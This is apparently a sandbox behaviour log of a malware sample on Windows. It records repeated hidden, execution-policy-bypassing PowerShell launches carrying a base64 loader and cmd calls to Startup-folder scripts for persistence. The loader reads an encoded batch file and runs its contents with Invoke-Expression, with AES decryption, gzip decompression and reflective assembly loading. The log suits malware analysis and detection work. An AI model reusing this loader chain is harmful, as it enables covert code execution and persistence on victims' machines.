Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb4fe679.cmd"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 